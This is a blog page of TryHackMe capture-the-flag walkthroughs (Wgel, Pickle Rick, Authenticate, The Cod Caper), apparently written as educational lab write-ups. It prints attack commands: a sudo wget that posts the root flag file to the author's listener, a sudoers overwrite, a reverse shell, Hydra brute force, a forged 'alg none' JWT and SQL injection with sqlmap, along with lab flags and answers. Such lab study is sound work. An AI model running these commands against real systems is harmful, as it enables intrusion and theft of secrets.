-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label CTF. Show all posts
Showing posts with label CTF. Show all posts
  • TryHackMe Wgel CTF Exfiltrate the root flag

     


    TryHackMe Wgel CTF Exfiltrate the root flag

     

    Wgel CTF is a TryHackMe machine, after listing the website we found a private key that gave us SSH access. We escalate privileges by modifying the sudoers file with Wget.


    First we start with NMAP tool. TCP port scan, we see two open ports http (80) and ssh (22).

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ sudo nmap -O 10.10.56.251                        
    [sudo] password for hackerboy: 
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 23:49 IST
    Nmap scan report for 10.10.56.251
    Host is up (0.21s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.93%E=4%D=7/28%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=64C406D
    OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=A)SEQ(SP=1
    OS:05%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O
    OS:3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=
    OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSN
    OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
    OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
    OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
    OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
    OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
    
    Network Distance: 2 hops
    
    OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 31.04 seconds
                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ 



     

    HTTP

    Apache is running on port 80. 




     We analyzed the source code of the apache index and found a comment that is not common in the apache index.

     

    SSH - Jessie

     

    GOBUSTER

    Directory and file scanning with gobuster.

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ sudo gobuster dir -u http://10.10.56.251/ -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
    [sudo] password for hackerboy: 
    /.html                (Status: 403) [Size: 277]
    /.htpasswd.txt        (Status: 403) [Size: 277]
    /index.html           (Status: 200) [Size: 11374]
    /index.html           (Status: 200) [Size: 11374]
    /server-status        (Status: 403) [Size: 277]
    /sitemap              (Status: 301) [Size: 314] [--> http://10.10.56.251/sitemap/]
                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$
    

     

     

    Page web and /sitemap/

     
            


     

     Again we do a scan with gobuster but now to the page we found ( /sitemap/). 


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ sudo gobuster dir -u http://10.10.56.251/sitemap -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
    [sudo] password for hackerboy: 
    
    /.htpasswd.txt        (Status: 403) [Size: 277]
    /.htpasswd.php        (Status: 403) [Size: 277]
    /.ssh                 (Status: 301) [Size: 319] [--> http://10.10.56.251/sitemap/.ssh/]
    /about.html           (Status: 200) [Size: 12232]
    /blog.html            (Status: 200) [Size: 12745]
    /contact.html         (Status: 200) [Size: 10346]
    /css                  (Status: 301) [Size: 318] [--> http://10.10.56.251/sitemap/css/]
    /fonts                (Status: 301) [Size: 320] [--> http://10.10.56.251/sitemap/fonts/]
    /images               (Status: 301) [Size: 321] [--> http://10.10.56.251/sitemap/images/]
    /index.html           (Status: 200) [Size: 21080]
    /index.html           (Status: 200) [Size: 21080]
    /js                   (Status: 301) [Size: 317] [--> http://10.10.56.251/sitemap/js/]
    /services.html        (Status: 200) [Size: 10131]
    /shop.html            (Status: 200) [Size: 17257]
    /work.html            (Status: 200) [Size: 11428]
                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ 
    
    
    

     


     

    SSH - Jessie

    We start session with Jessieand the private key we found earlier, we get an ssh shell and our first flag user_flag.txt .

     

    An id_rsa key can be used as an alternative method to log into SSH. Meaning, we do not need a password! Maybe we can try this against the Jessie user found earlier?


    Initial Access


    Download the id_rsa key from the webserver with wget:

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ wget http://10.10.56.251/sitemap/.ssh/id_rsa -O ./id_rsa.txt                                            
    --2023-07-29 01:22:03--  http://10.10.56.251/sitemap/.ssh/id_rsa
    Connecting to 10.10.56.251:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1675 (1.6K)
    Saving to: ‘./id_rsa.txt’
    
    ./id_rsa.txt                              100%[=====================================================================================>]   1.64K  --.-KB/s    in 0s      
    
    2023-07-29 01:22:03 (43.1 MB/s) - ‘./id_rsa.txt’ saved [1675/1675]
    
                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
    └─$ 
    
    
    

     

    Now login as Jessie:

    $ chmod 600 id_rsa.txt
    $ sudo chown hackerboy:hackerboy id_rsa.txt
    $ ssh jessie@10.10.56.251 -i id_rsa.txt

     

     


     


     

     

    Privilege Escalation


    Next, we need to read the root user flag. In order to do so, we need root privileges.

    A good first check is to run sudo -l to list what we can run as root:

     

     

    Click on this link to learn about sudo -l (all about enumeration) - CLICK HERE


     

     


     There are two entries here: (1) we can run all commands as root, but need to know Jessie’s password, and (2) we can run wget as root.

    According to the amazing GTFOBins repo we can use wget to read files. We’ll use this technique to read the root user’s flag:

     

    sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.22.119:4545

    # This is our system IP 10.9.22.119

    # we will same port from both side 4545


    Netcat listener

    nc  -lvp 4545


    Root flag - b1b968b37519ad1daa6408188649263d

    And in the wgel machine we execute the wget command with sudo which will overwrite the file /etc/sudoers.

    We are located in the folder /etc/and we execute:

    sudo /usr/bin/wget 10.9.22.119:4545/sudoers --output-document=sudoers





    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

     

  • TryHackMe Pickle Rick Walkthrough







    Greeting there, it is time for another tryhackme CTF write-up. Today, we are going through the Rick and Morty inspired CTF room. This room is called pickle rickkkkkkkkkkkkkkkk. Interesting huh. This is one of the easiest  challenges on the site. Without further ado, let’s get into the challenge.TryHackMe Pickle Rick Walkthrough



    We need to find the three secret ingredients in order to turn Rick back to his old self. Rick mentioned something on the webserver. Let’s enumerate the machine by using Nmap scanner.


    nmap -A -Pn -sC -sV --script vuln 10.10.28.46







    Visit TryHackMe IP Address



    Look like a message from Rick. The three secret ingredients are inside Rick’s computer. I have to get it. Before that, let’s check with the source code for more information.






    username :-



    We have the username now. How about the password? Time to use the gobuster.


    gobuster dir -u http://10.10.28.46 -w /usr/share/dirb/wordlists/common.txt







    We got robots.txt file inside the webserver. Gonna check it out.




    password :-




    Let's use gobuster again via GUI based...






    Yup, we just missed the portal.php files. Time to visit the portal site.










    The portal site has been resolved into a login page. How about trying the login credential we found it earlier (user: R1ckRul3s, pass: Wubbalubbadubdub)?






    After Login


    [Task 1] Pickle Rick



    This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.



    #1 Deploy the virtual machine on this task and explore the web application.

    What is the first ingredient Rick needs?





    ls -la

    less Sup3rS3cretPickl3Ingred.txt

    OR

    http://10.10.28.46/Sup3rS3cretPickl3Ingred.txt








    #2 Whats the second ingredient Rick needs?



    ls -la /home

    ls -la /home/rick

    less '/home/rick/second ingredients'




    There is another ingredient file hidden inside the file system. There might be another user inside the system.







    The second ingredient is inside the rick’s directory.











    #3 Whats the final ingredient Rick needs?




    I guess the next ingredient locate at /root directory. Before we make a visit to the directory, let see what we can do for the sudo command.



    sudo -l









    Cool, we can do everything using the sudo command. Let see what is inside the /root directory.



    sudo ls -la /root













    Yes, the third ingredient is inside the root directory.


    sudo less  /root/3rd.txt







    We are now gathering all 3 ingredients. yupeeeee!!!!






    Video Tutorial :soon otherwise search me on youtube kumar atul jaiswal

      

    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)






  • TryHackMe Authenticate Room Walkthrough







    Learn how to attack authentication mechanisms used in web applications


    A new room opened up recently on TryHackMe called Authenticate, so I thought I'd give it a shot and write this blog post whilst doing it. TryHackMe Authenticate Room Walkthrough

    It looks to be a relatively simple "walkthrough" style room where they give you all the information you need in order to crack it.

    I shall try to use different methods than the intended path as a test to show that for a lot of tasks there are many ways you can solve the challenges.


    Scan a room IP


    Tool :- Nmap*


    nmap -A -Pn -sC -sV --script vuln 10.10.25.136










    [Task 1] Deploy the VM


    In today's time, the use of the authentication system is increasing because of the increase in the number of services that are coming up on the internet. But not everyone knows how to either make proper authentication software or how to properly set up one.

    The aim of this room is to teach how to find authentication bugs and how you can exploit them.


    [Task 2] Dictionary attack



    The very obvious method of attacking any login form is just to brute force the credentials. But in this kind of brute force, we don't simply try numbers or simple alphabets. What we do is take an existing dictionary of commonly used username/passwords and use those to see if we can find the right combination. This is known as Dictionary Attack.

    To perform a dictionary attack we can use a lot of tools like Hydra or Medusa but the issue with these CLI tools is that we need to provide a lot of arguments to them started and that could be confusing. That is why when trying a dictionary attack on a web application/form it's better to use Burp Suite. In Burp we can capture the login request and then use intruder to perform the attack.

    If you are not familiar with burp suite then I would recommend that you first complete the Learn Burp Suite room.


    Now let me show you an example using the Burp Suite:

    1) Connect on port 8888

    2) Now while the Capture is On in burp suite, enter any values you like in the username and password field.

    3) Send this request to the intruder and for the position of the payload, we are just going to guess the password for the user jack. For payload, you can use any know default password list or maybe load a part of rockYou.

    Note: Here I know that there exists a user named jack and that is why I am using that. In a real-life scenario, you might have to guess both the username and password.






    4)  Start the attack and wait for a bit. If you did everything correctly you'll notice that one of the requests sent by an intruder will have a bigger response then all of the others.








    As you can see in the above screenshot that on the 5th request the length value is 530 and the length of the content in other requests is 480. This could mean that the burp was able to successfully login in Jack's account using the password 12345678.


    #1 What is the flag you found after logging as Jack?

    Ans :-  fad9ddc1feebd9e9bca05f02dd89e271
    
    


    Our Method


    Tool :- Hydra


    hydra -l mike -P /home/hackerboy/Documents/rockyou.txt "http-post-form://10.10.11.138:8888/login:user=^USER^&password=^PASS^:Invalid"




    -l : For username
    -p : For wordlist
    http-post-form :- Nmap*
    8888 : Nmap*







    #2 Now try the same thing for username mike.

    Ans :-  




    #3 What is the flag you found after logging as Mike?


    Ans :- 

    [Task 3] Re-registration




    In the previous task, we saw that it is possible to just simply guess/brute force the password with the help of a password dictionary. In this task, we are going to focus on a vulnerability that is unique in its own way.


    A lot of times what happens is that developer forgets to sanitize the input(username & password) given by the user in the code of their application which can make them vulnerable to things like SQL injection but SQLi could be a bit difficult to exploit. So we are going to focus on a vulnerability that happens because of a developer's mistake but is very easy to exploit i.e re-registration of an existing user.


    Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.


    To see this in action go to port 8888  and try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.




    #1 What is the flag that you found in darren's account?


    Note :- Space with highlated mark 





    Ans :- fe86079416a21a3c99937fea8874b667




    #2 Now try to do the same trick and see if you can login as arthur.


    Ans :- No Answer Needed



    #3 What is the flag that you found in arthur's account?



    Ans :- please Try it yourself




    [Task 4] JSON Web Token


    JSON Web Token(JWT) is one of the commonly used methods for authorization. This is a kind of cookie that is generated using HMAC hashing or public/private keys. So unlike any other kind of cookie, it lets the website know what kind of access the currently logged in user has. The only special thing about JWT is that they are in JSON format(after decoding).


    JWT can be divided into 3 parts separated by a dot(.)


    1) Header:  This consists of the algorithm used and the type of the token.


    {  "alg": "HS256", "typ": "JWT"}

    alg could be HMAC, RSA, SHA256 or can even contain None value.


    2) Payload: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.


    3) Signature: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)


    Now to put all the 3 part together we base64 encode all of them separated by a dot(.) so it would look something like:



    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c



    Note: This example was taken from jwt.io and you should check that website out if you want to learn more about JWT.




    Exploitation



    If used properly this is a very secure way of authorization but the problem is with using is "properly". A lot of developers misconfigure their system leaving it open to exploitation.


    Now one of the methods to exploit this is to perform a brute force/dictionary attack and find the secret used for encrypting the JWT token and then used that to generate new tokens. But here we are not going to do that, we are going to see a very amazing way of exploiting this.




    If you remember, in the Header section I said that the alg can be whatever the algorithm is used and also it can be None if no encryption is to be used. Now, this should not be used when the application is in production but again the problem of misconfiguration comes in and make the application vulnerable to this kind of attack. The attack is that an attacker can log in as low privilege user says guest and then get the JWT token for that user and then decode the token and edit the headers to use set alg value to None. This would mean that no encryption has to be used therefore the attacker wouldn't need to the secret used for encryption.



    Practical



    Let's see this method in practice. For this challenge visit the port 5000.


    It is a very simple login page and in that, you can log in via two users: user and user2. Now first let's try to login with the credentials of user:user . To do so first enter those credentials then click on the Authenticate button and then enable the capture in burp suite and then click on the Go button. In the burp tab, you should see a request to /protected and there you'll see the JWT token.











    Now take this JWT token and then you can decode it part by part.



    So if we decode the first part, which will do: {"typ":"JWT","alg":"HS256"}


    and decoding the 2nd part, we will get: {"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":1}


    If you try to decode the 3rd part then you'll get some gibberish. But that is okay we only need the first and the second part.

    Now if we notice the identity value that is probably being used to identify the user but if you'll just edit that then it won't work because as I said the 3rd part is encrypted. So to bypass this we will make changes in the header as well as the value of the identity.

    Encode the following string with base64 and that will be our first part


    {"typ":"JWT","alg":"NONE"}


    For the second part, we'll encode the following string:


    {"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":2}


    Notice how we changed the value of identity from 1  to 2.
    Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:



    eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.





    Now open the developer's tools in your browser and edit the stored cookie of the website to this new one and then just press the Go button and you'll notice that it will prompt "Welcome user2: guest2".


    In a similar manner, you can try to play and find other users on the website.


    This kind of misconfiguration in the authentication system is common and could be exploited to escalate privileges or steal information.






    Our Method


    #1 Use the same method to find identity of admin user and retrieve the flag?



    1) First you open Burp



    2) set proxy in your browser










    3) Enable Intercept on burp suite and Login with user:user









    4) Then, copy this :- eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.









    and replace with highlated mark and press forward button on burp suite











    Ans :-




    [Task 5] No Auth



    In this I am going to show you how a lot of systems don't even have proper authentication and their system is just left open for anyone to exploit it.





    A lot of time on websites we see that when we register a user and login with our credentials we are given a certain id which either is completely a number or ends with a number. Most of the time developers secures their application but sometime in some places, it could happen that just by changing that number we are able to see some hidden or private data.


    To test this go to port 7777. On that just create an account. Once the account is created visit your Private Space.









    As you can see in the image above the URL have /users/1. Try to change that value to 2 and we will get access to the admin account









    The chance of finding this kind of vulnerability is very low but it could be a very serious bug if you get lucky and found something like this.


     

    #1 Find the way to get into superadmin ad
     

    Ans :- No Answer Needed



    After Register and login Try With 0 :-


    http://10.10.11.138:7777/users/0



    #2 What is the password for superadmin account?


    Ans :- 









    #3 What is the flag you found in superadmin account?


    Ans :-





    Video Tutorial :

     

       

     

     

    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)






  • TryHackMe The Cod Caper Walkthrough





    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe The Cod Caper Walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     tryhackme rp nmap






    TryHackMe :- Click Here


    [Task 1] Intro


    Hello there my name is Pingu. I've come here to put in a request to get my fish back! My dad recently banned me from eating fish, as I wasn't eating my vegetables. He locked all the fish in a chest, and hid the key on my old pc, that he recently repurposed into a server. As all penguins are natural experts in penetration testing, I figured I could get the key myself! Unfortunately he banned every IP from Antarctica, so I am unable to do anything to the server. Therefore I call upon you my dear ally to help me get my fish back! Naturally I'll be guiding you through the process. TryHackMe The Cod Caper Walkthrough

    Note: This room expects some basic pen testing knowledge, as I will not be going over every tool in detail that is used. While you can just use the room to follow through, some interest or experiencing in assembly is highly recommended




    Ans :- No Needed



    [Task 2] Host Enumeration



    The first step is to see what ports and services are running on the target machine.


    Recommended Tool - nmap:


    Useful flags:


    -p :- Used to specify which port to analyze, can also be used to specify a range of ports i.e -p 1-1000



    -sC :- Runs default scripts on the port, useful for doing basic analysis on the service running on a port


    -A :- Aggressive mode, go all out and try to get as much information as possible



    #1 How many ports are open on the target machine?


    nmap 10.10.191.14





    Ans :- 2




    #2 What is the http-title of the web server?


    nmap -sC 10.10.191.15



     

    Ans :- Apache2 Ubuntu Default Page: it works





    #3 What version is the ssh service?









    nmap -sV 10.10.191.15





    Ans :- OpenSSH 7.2p2 Ubuntu 4ubuntu2.8




    #4 What is the version of the web server?


    nmap -A 10.10.191.15





    Ans :- Apache/2.4.18


    [Task 3] Web Enumeration


    Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.


    Recommended tool: gobuster


    Useful flags: 

    -x :- Used to specify file extensions i.e "php,txt,html"


    --url :- Used to specify which url to enumerate


    --wordlist :- Used to specify which wordlist that is appended on the url path i.e


    "http://url.com/word1"

    "http://url.com/word2"

    "http://url.com/word3.php"




    #1 What is the name of the important file on the server?


    gobuster -x .txt,.php,.html dir -u http://10.10.237.242 -w /usr/share/wordlists/dirb/common.txt











    ANS :- administrator.php




    [Task 4] Web Exploitation


    The admin page seems to give us a login form. In situations like this it is always worth it to check for "low-hanging fruit". In the case of login forms one of the first things to check for is SQL Injection.


    Recommended Tool: sqlmap

    Useful Flags:


    -u :- Specifies which url to attack

    --forms :- Automatically selects parameters from <form> elements on the page

    --dump :- Used to retrieve data from the db once SQLI is found

    -a :- Grabs just about everything from the db



    #1 What is the admin username?


    sqlmap -u http://10.10.110.216/administrator.php --dbs --forms










    pingudad


    #2 What is the admin password?






    secretpass


    #3 How many forms of SQLI is the form vulnerable to?







    Task 5: Command Execution



    In the previous task we get the login page and using the sqlmap we get the username and password after successful login we’ll the screen like this.


    And is a vulnerable to command execution.









    After login, we have a command prompt it seems we have got the ability to run commands. We executed a command “id” and we got the right result so we tried to execute python reverse shell after executing command we got a reverse shell.




    Now we’ll the run the nc on our system to get the reverse shell of target machine.


    Payloads are given in the link provided in the description of the task


    #nc -lnvp 4444


    Here my machine will listen to the target machine on the port no. 4444


    Now one by one we’ll check the payload by running it on the command column on the above image


    Before running the payload modify the IP add and Port


    Port will be 4444

    Ip add will be on the access page of the THM (Internal Virtual IP add)


    Luckily I got the reverse shell on running the first perl payload on this page


    https://highon.coffee/blog/reverse-shell-cheat-sheet/


    Now on further enumeration, you’ll get the password in the hidden directory .


    You will find the in /var/hidden/pass directory by using find command


    #find -name pass -type f



    Task 6: LinEnum



    Step1: Prepare the Script on Your Attack Machine


    # mkdir linenum

    # cd linenum/
    LinEnum and its script can be found on GitHub


    #wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    #python -
    m SimpleHTTPServer 4444




    Step2: Download the Script on the Target Machine


    Login as SSH on the target machine


    #ssh pingu@<IP>

    pingu@ubuntu$ cd /tmp

    pingu@ubuntu$ wget <IP>:4444/LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ chmod +x LinEnum.sh

    pingu@ubuntu$ ls -la

    pingu@ubuntu$ ./LinEnum.sh



    Now look for the SUID files in the results.


    Task 10: Finishing the Job



    Now we have the hash to crack here i have the given hash to root.txt file


    We’ll use the hashcat for cracking it


    # hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt


    On completing this we’ll have the root password .



    Ans :- love2fish






     ----------------





    Video Tutorial :- 



            


    Disclaimer


    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.